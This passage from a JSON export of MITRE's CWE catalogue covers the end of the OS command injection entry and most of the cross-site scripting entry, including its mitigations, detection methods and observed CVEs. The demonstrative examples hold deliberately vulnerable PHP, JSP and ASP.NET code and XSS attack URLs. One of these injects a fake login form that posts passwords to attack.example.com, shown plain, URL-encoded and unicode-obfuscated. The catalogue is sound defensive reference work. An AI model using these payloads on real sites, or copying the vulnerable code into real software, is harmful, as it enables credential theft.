Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Relationships"}],"Previous_Entry_Name":[{"#text":"OS Command Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Data into an OS Command (aka \'OS Command Injection\')","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Preserve OS Command Structure (aka \'OS Command Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Preserve OS Command Structure (\'OS Command Injection\')","attr":{"@_Date":"2009-07-27"}},{"#text":"Improper Sanitization of Special Elements used in an OS Command (\'OS Command Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"79":{"attr":{"@_ID":"79","@_Name":"Improper Neutralization of Input During Web Page Generation (\'Cross-site Scripting\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.","Extended_Description":{"xhtml:p":["Cross-site scripting (XSS) vulnerabilities occur when:","There are three main kinds of XSS:","Once the malicious script is injected, the attacker can perform a variety of malicious activities. The attacker could transfer private information, such as cookies that may include session information, from the victim\'s machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. Phishing attacks could be used to emulate trusted web sites and trick the victim into entering a password, allowing the attacker to compromise the victim\'s account on that web site. Finally, the script could exploit a vulnerability in the web browser itself possibly taking over the victim\'s machine, sometimes referred to as \\"drive-by hacking.\\"","In many cases, the attack can be launched without the victim even being aware of it. Even with careful users, attackers frequently use a variety of methods to encode the malicious portion of the attack, such as URL encoding or Unicode, so the request looks less suspicious."],"xhtml:ol":{"xhtml:li":["Untrusted data enters a web application, typically from a web request.","The web application dynamically generates a web page that contains this untrusted data.","During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc.","A victim visits the generated web page through a web browser, which contains malicious script that was injected using the untrusted data.","Since the script comes from a web page that was sent by the web server, the victim\'s web browser executes the malicious script in the context of the web server\'s domain.","This effectively violates the intention of the web browser\'s same-origin policy, which states that scripts in one domain should not be able to access resources or run code in a different domain."]},"xhtml:ul":{"xhtml:li":[{"#text":"- \\n \\t\\t\\tThe server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker\'s content back to the victim, the content is executed by the victim\'s browser.","xhtml:b":"Type 1: Reflected XSS (or Non-Persistent)"},{"#text":"- \\n The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker\'s perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs.","xhtml:b":"Type 2: Stored XSS (or Persistent)"},{"#text":"- \\n In DOM-based XSS, the client performs the injection of XSS into the page; in the other types, the server performs the injection. DOM-based XSS generally involves server-controlled, trusted script that is sent to the client, such as Javascript that performs sanity checks on a form before the user submits it. If the server-supplied script processes user-supplied data and then injects it back into the web page (such as with dynamic HTML), then DOM-based XSS is possible.","xhtml:b":"Type 0: DOM-Based XSS"}]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"494","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"352","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Often"}}},"Background_Details":{"Background_Detail":{"xhtml:div":[{"#text":"Same Origin Policy","attr":{"@_style":"color:#32498D; font-weight:bold;"}},{"#text":"Domain","attr":{"@_style":"color:#32498D; font-weight:bold;"}}],"xhtml:p":["The same origin policy states that browsers should limit the resources accessible to scripts running on a given web site, or \\"origin\\", to the resources associated with that web site on the client-side, and not the client-side resources of any other sites or \\"origins\\". The goal is to prevent one site from being able to modify or read the contents of an unrelated site. Since the World Wide Web involves interactions between many sites, this policy is important for browsers to enforce.","The Domain of a website when referring to XSS is roughly equivalent to the resources associated with that website on the client-side of the connection. That is, the domain can be thought of as all resources the browser is storing for the user\'s interactions with this particular site."]}},"Alternate_Terms":{"Alternate_Term":[{"Term":"XSS","Description":"\\"XSS\\" is a common abbreviation for Cross-Site Scripting."},{"Term":"HTML Injection","Description":"\\"HTML injection\\" is used as a synonym of stored (Type 2) XSS."},{"Term":"CSS","Description":"In the early years after initial discovery of XSS, \\"CSS\\" was a commonly-used acronym. However, this would cause confusion with \\"Cascading Style Sheets,\\" so usage of this acronym has declined significantly."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Access Control","Confidentiality"],"Impact":["Bypass Protection Mechanism","Read Application Data"],"Note":"The most common attack performed with cross-site scripting involves the disclosure of information stored in user cookies. Typically, a malicious user will craft a client-side script, which -- when parsed by a web browser -- performs some activity (such as sending all site cookies to a given E-mail address). This script will be loaded and run by each user visiting the web site. Since the site requesting to run the script has access to the cookies in question, the malicious script does also."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"In some circumstances it may be possible to run arbitrary code on a victim\'s computer when cross-site scripting is combined with other flaws."},{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Read Application Data"],"Note":"The consequence of an XSS attack is the same regardless of whether it is stored or reflected. The difference is in how the payload arrives at the server. XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. Some cross-site scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on the end user systems for a variety of nefarious purposes. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, running \\"Active X\\" controls (under Microsoft Internet Explorer) from sites that a user perceives as trustworthy, and modifying presentation of content."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible, especially when multiple components are involved.","Effectiveness":"Moderate"},{"Method":"Black Box","Description":"Use the XSS Cheat Sheet [REF-714] or automated test-generation tools to help launch a wide variety of attacks against your web application. The Cheat Sheet contains many subtle XSS variations that are specifically targeted against weak XSS defenses.","Effectiveness":"Moderate","Effectiveness_Notes":"With Stored XSS, the indirection caused by the data store can make it more difficult to find the problem. The tester must first inject the XSS string into the data store, then find the appropriate application functionality in which the XSS string is sent to other users of the application. These are two distinct steps in which the activation of the XSS can take place minutes, hours, or days after the XSS was originally injected into the data store."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft\'s Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket."]}},{"Phase":["Implementation","Architecture and Design"],"Description":{"xhtml:p":["Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.","For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.","Parts of the same output document may require different encodings, which will vary depending on whether the output is in the:","etc. Note that HTML Entity Encoding is only appropriate for the HTML body.","Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["HTML body","Element attributes (such as src=\\"XYZ\\")","URIs","JavaScript sections","Cascading Style Sheets and style property"]}}}},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":"Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.","Effectiveness":"Limited","Effectiveness_Notes":"This technique has limited effectiveness, but can be helpful when it is possible to store client state and sensitive information on the server side instead of in cookies, headers, hidden form fields, etc."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-27"},"Phase":"Architecture and Design","Strategy":"Parameterization","Description":"If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When dynamically constructing web pages, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. All input should be validated and cleansed, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. It is common to see data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended.","Note that proper output encoding, escaping, and quoting is the most effective solution for preventing XSS, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent XSS, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, in a chat application, the heart emoticon (\\"<3\\") would likely pass the validation step, since it is commonly used. However, it cannot be directly inserted into the web page because it contains the \\"<\\" character, which would need to be escaped or otherwise handled. In this case, stripping the \\"<\\" might reduce the risk of XSS, but it would produce incorrect behavior because the emoticon would not be recorded. This might seem to be a minor inconvenience, but it would be more important in a mathematical forum that wants to represent inequalities.","Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address.","Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere."]}},{"attr":{"@_Mitigation_ID":"MIT-21"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":"When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs."},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code displays a welcome message on a web page based on the HTTP GET username parameter. This example covers a Reflected XSS (Type 1) scenario.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$username = $_GET[\'username\'];echo \'<div class=\\"header\\"> Welcome, \' . $username . \'</div>\';","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"http://trustedSite.example.com/welcome.php?username=<Script Language=\\"Javascript\\">alert(\\"You\'ve been attacked!\\");</Script>"},{"attr":{"@_Nature":"attack"},"xhtml:div":"http://trustedSite.example.com/welcome.php?username=<div id=\\"stealPassword\\">Please Login:<form name=\\"input\\" action=\\"http://attack.example.com/stealPassword.php\\" method=\\"post\\">Username: <input type=\\"text\\" name=\\"username\\" /><br/>Password: <input type=\\"password\\" name=\\"password\\" /><br/><input type=\\"submit\\" value=\\"Login\\" /></form></div>"},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"<div class=\\"header\\"> Welcome, <div id=\\"stealPassword\\"> Please Login:</div></div>","xhtml:div":{"#text":"<form name=\\"input\\" action=\\"attack.example.com/stealPassword.php\\" method=\\"post\\"></form>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"Username: <input type=\\"text\\" name=\\"username\\" /><br/>Password: <input type=\\"password\\" name=\\"password\\" /><br/><input type=\\"submit\\" value=\\"Login\\" />","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}},"xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"trustedSite.example.com/welcome.php?username=%3Cdiv+id%3D%22stealPassword%22%3EPlease+Login%3A%3Cform+name%3D%22input%22+action%3D%22http%3A%2F%2Fattack.example.com%2FstealPassword.php%22+method%3D%22post%22%3EUsername%3A+%3Cinput+type%3D%22text%22+name%3D%22username%22+%2F%3E%3Cbr%2F%3EPassword%3A+%3Cinput+type%3D%22password%22+name%3D%22password%22+%2F%3E%3Cinput+type%3D%22submit%22+value%3D%22Login%22+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"trustedSite.example.com/welcome.php?username=<script+type=\\"text/javascript\\">document.write(\'\\\\u003C\\\\u0064\\\\u0069\\\\u0076\\\\u0020\\\\u0069\\\\u0064\\\\u003D\\\\u0022\\\\u0073\\\\u0074\\\\u0065\\\\u0061\\\\u006C\\\\u0050\\\\u0061\\\\u0073\\\\u0073\\\\u0077\\\\u006F\\\\u0072\\\\u0064\\\\u0022\\\\u003E\\\\u0050\\\\u006C\\\\u0065\\\\u0061\\\\u0073\\\\u0065\\\\u0020\\\\u004C\\\\u006F\\\\u0067\\\\u0069\\\\u006E\\\\u003A\\\\u003C\\\\u0066\\\\u006F\\\\u0072\\\\u006D\\\\u0020\\\\u006E\\\\u0061\\\\u006D\\\\u0065\\\\u003D\\\\u0022\\\\u0069\\\\u006E\\\\u0070\\\\u0075\\\\u0074\\\\u0022\\\\u0020\\\\u0061\\\\u0063\\\\u0074\\\\u0069\\\\u006F\\\\u006E\\\\u003D\\\\u0022\\\\u0068\\\\u0074\\\\u0074\\\\u0070\\\\u003A\\\\u002F\\\\u002F\\\\u0061\\\\u0074\\\\u0074\\\\u0061\\\\u0063\\\\u006B\\\\u002E\\\\u0065\\\\u0078\\\\u0061\\\\u006D\\\\u0070\\\\u006C\\\\u0065\\\\u002E\\\\u0063\\\\u006F\\\\u006D\\\\u002F\\\\u0073\\\\u0074\\\\u0065\\\\u0061\\\\u006C\\\\u0050\\\\u0061\\\\u0073\\\\u0073\\\\u0077\\\\u006F\\\\u0072\\\\u0064\\\\u002E\\\\u0070\\\\u0068\\\\u0070\\\\u0022\\\\u0020\\\\u006D\\\\u0065\\\\u0074\\\\u0068\\\\u006F\\\\u0064\\\\u003D\\\\u0022\\\\u0070\\\\u006F\\\\u0073\\\\u0074\\\\u0022\\\\u003E\\\\u0055\\\\u0073\\\\u0065\\\\u0072\\\\u006E\\\\u0061\\\\u006D\\\\u0065\\\\u003A\\\\u0020\\\\u003C\\\\u0069\\\\u006E\\\\u0070\\\\u0075\\\\u0074\\\\u0020\\\\u0074\\\\u0079\\\\u0070\\\\u0065\\\\u003D\\\\u0022\\\\u0074\\\\u0065\\\\u0078\\\\u0074\\\\u0022\\\\u0020\\\\u006E\\\\u0061\\\\u006D\\\\u0065\\\\u003D\\\\u0022\\\\u0075\\\\u0073\\\\u0065\\\\u0072\\\\u006E\\\\u0061\\\\u006D\\\\u0065\\\\u0022\\\\u0020\\\\u002F\\\\u003E\\\\u003C\\\\u0062\\\\u0072\\\\u002F\\\\u003E\\\\u0050\\\\u0061\\\\u0073\\\\u0073\\\\u0077\\\\u006F\\\\u0072\\\\u0064\\\\u003A\\\\u0020\\\\u003C\\\\u0069\\\\u006E\\\\u0070\\\\u0075\\\\u0074\\\\u0020\\\\u0074\\\\u0079\\\\u0070\\\\u0065\\\\u003D\\\\u0022\\\\u0070\\\\u0061\\\\u0073\\\\u0073\\\\u0077\\\\u006F\\\\u0072\\\\u0064\\\\u0022\\\\u0020\\\\u006E\\\\u0061\\\\u006D\\\\u0065\\\\u003D\\\\u0022\\\\u0070\\\\u0061\\\\u0073\\\\u0073\\\\u0077\\\\u006F\\\\u0072\\\\u0064\\\\u0022\\\\u0020\\\\u002F\\\\u003E\\\\u003C\\\\u0069\\\\u006E\\\\u0070\\\\u0075\\\\u0074\\\\u0020\\\\u0074\\\\u0079\\\\u0070\\\\u0065\\\\u003D\\\\u0022\\\\u0073\\\\u0075\\\\u0062\\\\u006D\\\\u0069\\\\u0074\\\\u0022\\\\u0020\\\\u0076\\\\u0061\\\\u006C\\\\u0075\\\\u0065\\\\u003D\\\\u0022\\\\u004C\\\\u006F\\\\u0067\\\\u0069\\\\u006E\\\\u0022\\\\u0020\\\\u002F\\\\u003E\\\\u003C\\\\u002F\\\\u0066\\\\u006F\\\\u0072\\\\u006D\\\\u003E\\\\u003C\\\\u002F\\\\u0064\\\\u0069\\\\u0076\\\\u003E\\\\u000D\');</script>","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","",""]}}],"Body_Text":["Because the parameter can be arbitrary, the url of the page could be modified so $username contains scripting syntax, such as","This results in a harmless alert dialog popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers.","More realistically, the attacker can embed a fake login box on the page, tricking the user into sending the user\'s password to the attacker:","If a user clicks on this link then Welcome.php will generate the following HTML and send it to the user\'s browser:","The trustworthy domain of the URL may falsely assure the user that it is OK to follow the link. However, an astute user may notice the suspicious text appended to the URL. An attacker may further obfuscate the URL (the following example links are broken into multiple lines for readability):","The same attack string could also be obfuscated as:","Both of these attack links will result in the fake login box appearing on the page, and users are more likely to ignore indecipherable text at the end of URLs."]},{"Intro_Text":"This example also displays a Reflected XSS (Type 1) scenario.","Body_Text":["The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.","The following ASP.NET code segment reads an employee ID number from an HTTP request and displays it to the user.","The code in this example operates correctly if the Employee ID variable contains only standard alphanumeric text. If it has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"<% String eid = request.getParameter(\\"eid\\"); %>...Employee ID: <%= eid %>","xhtml:br":["",""]}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"<%protected System.Web.UI.WebControls.TextBox Login;protected System.Web.UI.WebControls.Label EmployeeID;...EmployeeID.Text = Login.Text;%><p><asp:label id=\\"EmployeeID\\" runat=\\"server\\" /></p>","xhtml:br":["","","","","","",""]}}]},{"Intro_Text":"This example covers a Stored XSS (Type 2) scenario.","Body_Text":["The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee\'s name.","The following ASP.NET code segment queries a database for an employee with a given employee ID and prints the name corresponding with the ID.","This code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user\'s web browser."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"<%Statement stmt = conn.createStatement();ResultSet rs = stmt.executeQuery(\\"select * from emp where id=\\"+eid);if (rs != null) {}%>Employee Name: <%= name %>","xhtml:br":["","","",""],"xhtml:div":{"#text":"rs.next();String name = rs.getString(\\"name\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"<%protected System.Web.UI.WebControls.Label EmployeeName;...string query = \\"select * from emp where id=\\" + eid;sda = new SqlDataAdapter(query, conn);sda.Fill(dt);string name = dt.Rows[0][\\"Name\\"];...EmployeeName.Text = name;%><p><asp:label id=\\"EmployeeName\\" runat=\\"server\\" /></p>","xhtml:br":["","","","","","","","",""]}}]},{"Intro_Text":"The following example consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario.","Body_Text":["CreateUser.php","The code is careful to avoid a SQL injection attack (CWE-89) but does not stop valid HTML from being stored in the database. This can be exploited later when ListUsers.php retrieves the information:","ListUsers.php","The attacker can set their name to be arbitrary HTML, which will then be displayed to all visitors of the Active Users page. This HTML can, for example, be a password stealing Login message."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$username = mysql_real_escape_string($username);$fullName = mysql_real_escape_string($fullName);$query = sprintf(\'Insert Into users (username,password) Values (\\"%s\\",\\"%s\\",\\"%s\\")\', $username, crypt($password),$fullName) ;mysql_query($query);/.../","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$query = \'Select * From users Where loggedIn=true\';$results = mysql_query($query);if (!$results) {}echo \'<div id=\\"userlist\\">Currently Active Users:\';while ($row = mysql_fetch_assoc($results)) {}echo \'</div>\';","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"exit;","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \'<div class=\\"userNames\\">\'.$row[\'fullname\'].\'</div>\';","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"//Print list of users to page"}}]},{"Intro_Text":"Consider an application that provides a simplistic message board that saves messages in HTML format and appends them to a file. When a new user arrives in the room, it makes an announcement:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$name = $_COOKIE[\\"myname\\"];$announceStr = \\"$name just logged in.\\";saveMessage($announceStr);","xhtml:br":["","","",""],"xhtml:i":"//save HTML-formatted message to file; implementation details are irrelevant for this example."}},{"attr":{"@_Nature":"attack"},"xhtml:div":"<script>document.alert(\'Hacked\');</script>"},{"attr":{"@_Nature":"result"},"xhtml:div":"<script>document.alert(\'Hacked\');</script> has logged in."}],"Body_Text":["An attacker may be able to perform an HTML injection (Type 2 XSS) attack by setting a cookie to a value like:","The raw contents of the message file would look like:","For each person who visits the message page, their browser would execute the script, generating a pop-up window that says \\"Hacked\\". More malicious attacks are possible; see the rest of this entry."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-8958","Description":"Admin GUI allows XSS through cookie.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8958"},{"Reference":"CVE-2017-9764","Description":"Web stats program allows XSS through crafted HTTP header.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9764"},{"Reference":"CVE-2014-5198","Description":"Web log analysis product allows XSS through crafted HTTP Referer header.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5198"},{"Reference":"CVE-2008-5080","Description":"Chain: protection mechanism failure allows XSS","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5080"},{"Reference":"CVE-2006-4308","Description":"Chain: incomplete denylist (CWE-184) only checks \\"javascript:\\" tag, allowing XSS (CWE-79) using other tags","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4308"},{"Reference":"CVE-2007-5727","Description":"Chain: incomplete denylist (CWE-184) only removes SCRIPT tags, enabling XSS (CWE-79)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5727"},{"Reference":"CVE-2008-5770","Description":"Reflected XSS using the PATH_INFO in a URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5770"},{"Reference":"CVE-2008-4730","Description":"Reflected XSS not properly handled when generating an error message","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4730"},{"Reference":"CVE-2008-5734","Description":"Reflected XSS sent through email message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5734"},{"Reference":"CVE-2008-0971","Description":"Stored XSS in a security 